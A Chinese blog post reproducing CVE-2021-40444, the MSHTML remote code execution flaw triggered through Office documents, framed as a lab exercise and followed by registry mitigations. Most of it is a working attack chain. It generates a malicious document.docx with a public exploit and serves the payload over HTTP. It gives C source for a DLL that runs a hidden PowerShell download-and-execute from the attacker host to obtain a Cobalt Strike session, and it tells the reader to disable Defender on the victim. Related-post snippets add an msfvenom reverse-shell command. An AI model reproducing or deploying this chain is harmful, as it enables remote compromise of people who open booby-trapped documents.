CVE-2021-40444复现

最新推荐文章于 2025-03-17 15:48:33 发布
最新推荐文章于 2025-03-17 15:48:33 发布
阅读量1.9k 收藏 14
点赞数 6
文章标签: CVE-2021-40444
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42345596/article/details/120327007
版权

CVE-2021-40444复现

漏洞描述

2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。

MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word、Excel或PowerPoint文档中呈现Web托管的内容,AcitveX控件是微软COM架构下的产物,在Windows的Office套件、IE浏览器中有广泛的应用,利用ActiveX控件即可与MSHTML组件进行交互。

影响范围

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems

漏洞危害

未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。

漏洞复现

复现环境:win10(office10),kali2021

github地址:https://github.com/lockedbyte/CVE-2021-40444

image-20210916101633325

需要先安装lcab( lcab 包的官方下载地址已经无法下载,所以代替为 Debian 的官方下载地址)

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install

image-20210916101452067

image-20210916101548259

然后执行命令

 python3 exploit.py generate test/calc.dll http://192.168.190.129:80

image-20210916101732983

可以看见在out目录下生成了document.docx文件;

image-20210916101828485

开启http服务

python exploit.py host 80

image-20210916101951396

image-20210916102050987

打开word.html文件可以看见,url是向外请求的cab文件链接

image-20210916102326389

接着把document.docx拉到受害机子双击打开(切记:这里受害机子一定要关闭denfender,同时ie浏览器也一定要启动运行Activex控件和插件!!!)

image-20210915103249889

image-20210913124555962

成功弹出计算器

把document.docx文件解压,进到/word/rels/document.xml文件中可以看见,发现是通过MSHTML来进行远程代码执行。

image-20210916103106420

cs上线

cs生成ps payload;

08c570f8381ef23230c1f95c8cc1616

image-20210916110244240

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZQP7s4CR-1631779736826)(C:/Users/zcc/AppData/Local/Temp/WeChat%20Files/bd7c6a783330f173f454b1a9e076028.png)]

image-20210901155938568

写入1.c:

#include <windows.h>
void exec(void) {
system("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://你的ip:你的端口/a'))\"");
return;
}
BOOL WINAPI DllMain(
   HINSTANCE hinstDLL,
   DWORD fdwReason,
   LPVOID lpReserved )
{
   switch( fdwReason )
  {
       case DLL_PROCESS_ATTACH:
          exec();
          break;
       case DLL_THREAD_ATTACH:
           break;
       case DLL_THREAD_DETACH:
           break;
       case DLL_PROCESS_DETACH:
           break;
  }
   return TRUE;
}

生成dll

sudo apt-get install gcc-mingw-w64
i686-w64-mingw32-gcc -shared 1.c -o 1.dll

image-20210916115843274

image-20210916122446247

image-20210916122541682

受害机子成功上线~

image-20210916122619914

缓解措施

1.在 Internet Explorer 中禁用所有 ActiveX 控件的安装。

2.将如下代码复制到文本文件中并以 .reg 文件扩展名保存:

Windows Registry EditorVersion 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet  Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet  Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet  Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet  Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

b、双击.reg 文件,将其应用到策略配置单元;

c、重新启动系统以确保应用新配置。

qyshskx
关注
CVE-2021-40444 复现
问题很多的小明
09-20 1700
利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档 复现环境:Ubuntu + WIN10 利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444 0x01 生成恶意dll : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll 需要提前下载lcab库 .
〖EXP〗Ladon CVE-2021-40444 Office漏洞复现Cobalt Strike上线
K8哥哥
09-15 2482
漏洞概述 北京时间9月8日,绿盟科技CERT监测到微软发布安全通告披露了Microsoft MSHTML 远程代码执行漏洞,攻击者可通过制作恶意的 ActiveX 控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码。微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer 浏览器引擎,也用于 Office 应用程序,以在 Wo
CVE-2021-4034漏洞复现
最新发布
qq_75161850的博客
03-17 1274
该漏洞是 Linux 系统中 Polkit 组件的 pkexec 工具存在的本地权限提升漏洞,也被称为。
CVE-2021-40444_复现
PureDust的博客
09-14 1079
CVE-2021-40444_Microsoft MSHTML 远程代码执行复现准备上线设置cs,powershell,端口设置了8080复制word_dat为tmp_doc制作dll文件 准备 1.下载github的代码 https://github.com/lockedbyte/CVE-2021-40444 2.安装lcab sudo apt-get install lcab 3.安装编译环境 apt-get install mingw-w64 上线 设置cs,powershell,端口设置了808
CVE-2021-40444漏洞复现详细
热门推荐
weixin_51203422的博客
09-14 1万+
2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 1、漏洞详情: Microsoft MSHTML远程代码执行漏洞 CVE-2021-40444 严重级别:严重 CVSS:8.8 被利用级别:检测到利用 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添...
CVE-2021-40444漏洞复现
1ance's blog
09-25 3920
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
漏洞复现CVE-2021-40444(Microsoft MSHTML 远程代码执行漏洞)
weixin_42282189的博客
09-24 1489
作者:墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。 目前,该漏洞EXP已公开,微软官方公布已检测到在野利用,已发布修复补丁。 影响范围: Windows Server, version 20H2 (Server Core Installation) .
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
03-03
2021年,盐栈遭遇了两个严重的安全漏洞,分别是CVE-2021-25281和CVE-2021-25282。这两个漏洞允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统破坏或被用作进一步攻击的跳板。 **CVE-2021-...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-40444 Microsoft MSHTML RCE简单复现
qq_30947463的博客
05-05 2096
漏洞概述: 2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 [ ](https://blog.youkuaiyun.com/weixin_42345596/article/details/120327007) MSHTML是微软旗下的
CVE-2021-40444:MSHTML RCE预警
Fly_鹏程万里
09-13 2581
影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019
全面武装的CVE-2021-40444漏洞利用工具
gitblog_00078的博客
05-17 355
全面武装的CVE-2021-40444漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 Fully Weaponized CVE-2021-40444 是一个恶意docx文件生成器,它能够利用Microsoft Office Word中的CVE-2021-40444远程代码执行漏洞,并支持任意DLL文件。该工具最近已更新以支持最新的Follina攻击(通过m...
Microsoft MSHTML远程代码执行(CVE-2021-40444)
huayimy的博客
02-03 361
Microsoft MSHTML远程代码执行(CVE-2021-40444).攻击者利用该漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft Office文件,并诱导受害者打开文档,从而触发此漏洞。未经身份验证的攻击者利用该漏洞,可获得受害者的当前用户权限,以该用户权限执行任意代码。打开后,靶机计算器被成功调用,至此漏洞利用成功。
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
include_voidmain的博客
06-30 626
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
RCE高危漏洞预警:CVE-2021-40444简要分析
「鸿渐之翼」的博客
09-24 2266
漏洞影响及其危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。 Microsoft发布了一份关于此漏洞的官方公告。 这篇博客文章讨论了该漏洞如何发挥作用.。 我们已获得多个利用此漏洞的文档样本。文档包中的document.xml.rels文件中都包含以下代码: 请大家主要,存在一个URL(我们已删除),该URL下载一个名为side.html的文件(SHA-256:D0FD7ACC38B3105FACD699534242F28E45F5380FDF2EC93EA24BFBC1DC9E6)。该文件
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二)
include_voidmain的博客
06-30 351
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二)
CVE-2021-40444
08-09
回答: CVE-2021-40444是一个安全漏洞,其利用链包括通过目标链接下载一个cab临时文件,利用目录遍历漏洞在固定路径保存inf文件,并通过url scheme执行cpl文件的方式执行恶意inf文件。这个漏洞存在于微软的MHTML引擎中,它允许攻击者通过构造恶意的Office文档来执行远程命令。针对此漏洞,微软已发布了安全公告,并提供了部分解决方法。建议及时更新相关软件以保护系统安全。
评论 19
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值